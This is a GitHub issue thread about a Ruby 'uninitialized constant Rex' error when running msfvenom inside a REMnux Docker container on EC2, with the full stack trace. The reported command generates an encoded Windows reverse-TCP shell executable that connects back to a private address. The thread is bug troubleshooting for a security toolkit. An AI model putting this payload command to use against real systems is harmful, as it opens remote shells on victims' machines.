### ISSUE TITLE
Error: uninitialized constant Rex

### ISSUE THREAD

**Issue by Jared-Harrington-Gibbs** [REMnux/docker#22]
# Main Issue
I am running a docker image on a ubuntu ec2 instance. The command below fails on the ec2 instance but works on my local machine.

**Command*
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

**Output**
/usr/local/bin/msfvenom:138:in `block in parse_args': uninitialized constant Rex (NameError)
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1571:in `block in parse_in_order'
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1527:in `catch'
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1527:in `parse_in_order'
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1521:in `order!'
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1613:in `permute!'
	from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1635:in `parse!'
	from /usr/local/bin/msfvenom:174:in `parse_args'
	from /usr/local/bin/msfvenom:287:in `<main>'

## more info
The container works when I skip the update. This may be an issue upstream with Metasploit.

**Comment by Jared-Harrington-Gibbs** [comment]
Closing due to inactivity
